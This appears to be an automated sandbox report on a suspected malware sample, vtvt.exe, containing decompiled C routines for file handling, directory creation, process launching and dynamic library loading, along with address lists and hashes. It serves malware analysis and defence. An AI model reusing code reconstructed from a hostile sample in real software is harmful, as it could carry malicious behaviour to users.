                                                                                    0x0040338b
                                                                                    0x00403396
                                                                                    0x00403396
                                                                                    0x0040339e
                                                                                    0x004033a5
                                                                                    0x004033b7
                                                                                    0x004033be
                                                                                    0x00403463
                                                                                    0x00403463
                                                                                    0x00000000
                                                                                    0x004033c4
                                                                                    0x004033c7
                                                                                    0x004033d3
                                                                                    0x004033d7
                                                                                    0x00403471
                                                                                    0x00403471
                                                                                    0x004033dd
                                                                                    0x004033e0
                                                                                    0x0040343f
                                                                                    0x00403445
                                                                                    0x00403447
                                                                                    0x00403447
                                                                                    0x00403459
                                                                                    0x00403461
                                                                                    0x00403468
                                                                                    0x0040346b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004033e2
                                                                                    0x004033e5
                                                                                    0x00000000
                                                                                    0x004033eb
                                                                                    0x004033f0
                                                                                    0x004033f7
                                                                                    0x004033fa
                                                                                    0x004033fc
                                                                                    0x004033fc
                                                                                    0x00403409
                                                                                    0x0040340c
                                                                                    0x00403413
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040341c
                                                                                    0x00403423
                                                                                    0x0040343b
                                                                                    0x00403465
                                                                                    0x00403465
                                                                                    0x00403425
                                                                                    0x00403425
                                                                                    0x00403428
                                                                                    0x0040342b
                                                                                    0x00403431
                                                                                    0x00403437
                                                                                    0x00000000
                                                                                    0x00403439
                                                                                    0x00000000
                                                                                    0x00403439
                                                                                    0x00403437
                                                                                    0x00000000
                                                                                    0x00403423
                                                                                    0x00000000
                                                                                    0x004033f0
                                                                                    0x004033e5
                                                                                    0x004033e0
                                                                                    0x004033d7
                                                                                    0x004033be
                                                                                    0x00403473
                                                                                    0x00403476

                                                                                    APIs
                                                                                    • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: FilePointer
                                                                                    • String ID:
                                                                                    • API String ID: 973152223-0
                                                                                    • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                                                    • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                                                                                    • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                                                    • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 86%
                                                                                    			E004015C1(short __ebx, void* __eflags) {
                                                                                    				void* _t17;
                                                                                    				int _t23;
                                                                                    				void* _t25;
                                                                                    				signed char _t26;
                                                                                    				short _t28;
                                                                                    				short _t31;
                                                                                    				short* _t34;
                                                                                    				void* _t36;
                                                                                    
                                                                                    				_t28 = __ebx;
                                                                                    				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                                                                    				_t17 = E00405FE2(_t16);
                                                                                    				_t32 = _t17;
                                                                                    				if(_t17 != __ebx) {
                                                                                    					do {
                                                                                    						_t34 = E00405F64(_t32, 0x5c);
                                                                                    						_t31 =  *_t34;
                                                                                    						 *_t34 = _t28;
                                                                                    						if(_t31 != _t28) {
                                                                                    							L5:
                                                                                    							_t25 = E00405C16( *(_t36 + 8));
                                                                                    						} else {
                                                                                    							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                                                                    							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
                                                                                    								goto L5;
                                                                                    							} else {
                                                                                    								_t25 = E00405B99( *(_t36 + 8));
                                                                                    							}
                                                                                    						}
                                                                                    						if(_t25 != _t28) {
                                                                                    							if(_t25 != 0xb7) {
                                                                                    								L9:
                                                                                    								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                                    							} else {
                                                                                    								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                                                    								if((_t26 & 0x00000010) == 0) {
                                                                                    									goto L9;
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    						 *_t34 = _t31;
                                                                                    						_t32 = _t34 + 2;
                                                                                    					} while (_t31 != _t28);
                                                                                    				}
                                                                                    				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                                                                    					_push(0xfffffff5);
                                                                                    					E00401423();
                                                                                    				} else {
                                                                                    					E00401423(0xffffffe6);
                                                                                    					E00406668(0x436000,  *(_t36 + 8));
                                                                                    					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                                                    					if(_t23 == 0) {
                                                                                    						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                                    					}
                                                                                    				}
                                                                                    				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
                                                                                    				return 0;
                                                                                    			}











                                                                                    0x004015c1
                                                                                    0x004015c9
                                                                                    0x004015cc
                                                                                    0x004015d1
                                                                                    0x004015d5
                                                                                    0x004015d7
                                                                                    0x004015df
                                                                                    0x004015e1
                                                                                    0x004015e4
                                                                                    0x004015ea
                                                                                    0x00401604
                                                                                    0x00401607
                                                                                    0x004015ec
                                                                                    0x004015ec
                                                                                    0x004015ef
                                                                                    0x00000000
                                                                                    0x004015fa
                                                                                    0x004015fd
                                                                                    0x004015fd
                                                                                    0x004015ef
                                                                                    0x0040160e
                                                                                    0x00401615
                                                                                    0x00401624
                                                                                    0x00401624
                                                                                    0x00401617
                                                                                    0x0040161a
                                                                                    0x00401622
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00401622
                                                                                    0x00401615
                                                                                    0x00401627
                                                                                    0x0040162b
                                                                                    0x0040162c
                                                                                    0x004015d7
                                                                                    0x00401634
                                                                                    0x00401663
                                                                                    0x004022f1
                                                                                    0x00401636
                                                                                    0x00401638
                                                                                    0x00401645
                                                                                    0x0040164d
                                                                                    0x00401655
                                                                                    0x0040165b
                                                                                    0x0040165b
                                                                                    0x00401655
                                                                                    0x00402c2d
                                                                                    0x00402c39

                                                                                    APIs
                                                                                      • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,7476FAA0,?,7476F560,00405D94,?,7476FAA0,7476F560,00000000), ref: 00405FF0
                                                                                      • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                                      • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                      • Part of subcall function 00405B99: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                    • String ID:
                                                                                    • API String ID: 1892508949-0
                                                                                    • Opcode ID: 78b35cda00fef60e7fad3ee9365003173471bcb7d959d196d715232f24f54807
                                                                                    • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                                                                                    • Opcode Fuzzy Hash: 78b35cda00fef60e7fad3ee9365003173471bcb7d959d196d715232f24f54807
                                                                                    • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 69%
                                                                                    			E00401389(signed int _a4) {
                                                                                    				intOrPtr* _t6;
                                                                                    				void* _t8;
                                                                                    				void* _t10;
                                                                                    				signed int _t11;
                                                                                    				void* _t12;
                                                                                    				signed int _t16;
                                                                                    				signed int _t17;
                                                                                    				void* _t18;
                                                                                    
                                                                                    				_t17 = _a4;
                                                                                    				while(_t17 >= 0) {
                                                                                    					_t6 = _t17 * 0x1c +  *0x42a290;
                                                                                    					if( *_t6 == 1) {
                                                                                    						break;
                                                                                    					}
                                                                                    					_push(_t6); // executed
                                                                                    					_t8 = E00401434(); // executed
                                                                                    					if(_t8 == 0x7fffffff) {
                                                                                    						return 0x7fffffff;
                                                                                    					}
                                                                                    					_t10 = E0040136D(_t8);
                                                                                    					if(_t10 != 0) {
                                                                                    						_t11 = _t10 - 1;
                                                                                    						_t16 = _t17;
                                                                                    						_t17 = _t11;
                                                                                    						_t12 = _t11 - _t16;
                                                                                    					} else {
                                                                                    						_t12 = _t10 + 1;
                                                                                    						_t17 = _t17 + 1;
                                                                                    					}
                                                                                    					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                                    						 *0x42924c =  *0x42924c + _t12;
                                                                                    						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
                                                                                    					}
                                                                                    				}
                                                                                    				return 0;
                                                                                    			}











                                                                                    0x0040138a
                                                                                    0x004013fa
                                                                                    0x0040139b
                                                                                    0x004013a0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004013a2
                                                                                    0x004013a3
                                                                                    0x004013ad
                                                                                    0x00000000
                                                                                    0x00401404
                                                                                    0x004013b0
                                                                                    0x004013b7
                                                                                    0x004013bd
                                                                                    0x004013be
                                                                                    0x004013c0
                                                                                    0x004013c2
                                                                                    0x004013b9
                                                                                    0x004013b9
                                                                                    0x004013ba
                                                                                    0x004013ba
                                                                                    0x004013c9
                                                                                    0x004013cb
                                                                                    0x004013f4
                                                                                    0x004013f4
                                                                                    0x004013c9
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                    • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                                    • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                                                                                    • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                                                    • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00405C4B(WCHAR* _a4) {
                                                                                    				struct _PROCESS_INFORMATION _v20;
                                                                                    				int _t7;
                                                                                    
                                                                                    				0x426750->cb = 0x44;
                                                                                    				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
                                                                                    				if(_t7 != 0) {
                                                                                    					CloseHandle(_v20.hThread);
                                                                                    					return _v20.hProcess;
                                                                                    				}
                                                                                    				return _t7;
                                                                                    			}





                                                                                    0x00405c54
                                                                                    0x00405c74
                                                                                    0x00405c7c
                                                                                    0x00405c81
                                                                                    0x00000000
                                                                                    0x00405c87
                                                                                    0x00405c8b

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateHandleProcess
                                                                                    • String ID:
                                                                                    • API String ID: 3712363035-0
                                                                                    • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                                                    • Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
                                                                                    • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                                                    • Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00406A35(signed int _a4) {
                                                                                    				struct HINSTANCE__* _t5;
                                                                                    				signed int _t10;
                                                                                    
                                                                                    				_t10 = _a4 << 3;
                                                                                    				_t8 =  *(_t10 + 0x40a410);
                                                                                    				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
                                                                                    				if(_t5 != 0) {
                                                                                    					L2:
                                                                                    					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
                                                                                    				}
                                                                                    				_t5 = E004069C5(_t8); // executed
                                                                                    				if(_t5 == 0) {
                                                                                    					return 0;
                                                                                    				}
                                                                                    				goto L2;
                                                                                    			}





                                                                                    0x00406a3d
                                                                                    0x00406a40
                                                                                    0x00406a47
                                                                                    0x00406a4f
                                                                                    0x00406a5b
                                                                                    0x00000000
                                                                                    0x00406a62
                                                                                    0x00406a52
                                                                                    0x00406a59
                                                                                    0x00000000
                                                                                    0x00406a6a
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                                      • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                                      • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                                                                      • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 2547128583-0
                                                                                    • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                                                    • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                                                                                    • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                                                    • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 68%
                                                                                    			E00406158(WCHAR* _a4, long _a8, long _a12) {
                                                                                    				signed int _t5;
                                                                                    				void* _t6;
                                                                                    
                                                                                    				_t5 = GetFileAttributesW(_a4); // executed
                                                                                    				asm("sbb ecx, ecx");
                                                                                    				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                                    				return _t6;
                                                                                    			}





                                                                                    0x0040615c
                                                                                    0x00406169
                                                                                    0x0040617e
                                                                                    0x00406184

                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\AppData\Roaming\vtvt.exe,80000000,00000003), ref: 0040615C
                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$AttributesCreate
                                                                                    • String ID:
                                                                                    • API String ID: 415043291-0
                                                                                    • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                                    • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                                                                    • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                                                    • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00406133(WCHAR* _a4) {
                                                                                    				signed char _t3;
                                                                                    				signed char _t7;
                                                                                    
                                                                                    				_t3 = GetFileAttributesW(_a4); // executed
                                                                                    				_t7 = _t3;
                                                                                    				if(_t7 != 0xffffffff) {
                                                                                    					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
                                                                                    				}
                                                                                    				return _t7;
                                                                                    			}





                                                                                    0x00406138
                                                                                    0x0040613e
                                                                                    0x00406143
                                                                                    0x0040614c
                                                                                    0x0040614c
                                                                                    0x00406155

                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                                                    • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                    • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                                                                                    • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                                                    • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00405C16(WCHAR* _a4) {
                                                                                    				int _t2;
                                                                                    
                                                                                    				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                                                    				if(_t2 == 0) {
                                                                                    					return GetLastError();
                                                                                    				}
                                                                                    				return 0;
                                                                                    			}




                                                                                    0x00405c1c
                                                                                    0x00405c24
                                                                                    0x00000000
                                                                                    0x00405c2a
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                                    • GetLastError.KERNEL32 ref: 00405C2A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1375471231-0
                                                                                    • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                                    • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                                                                                    • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                                                    • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E0040620A(void* _a4, void* _a8, long _a12) {
                                                                                    				int _t7;
                                                                                    				long _t11;
                                                                                    
                                                                                    				_t11 = _a12;
                                                                                    				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                    				if(_t7 == 0 || _t11 != _a12) {
                                                                                    					return 0;
                                                                                    				} else {
                                                                                    					return 1;
                                                                                    				}
                                                                                    			}





                                                                                    0x0040620e
                                                                                    0x0040621e
                                                                                    0x00406226
                                                                                    0x00000000
                                                                                    0x0040622d
                                                                                    0x00000000
                                                                                    0x0040622f

                                                                                    APIs
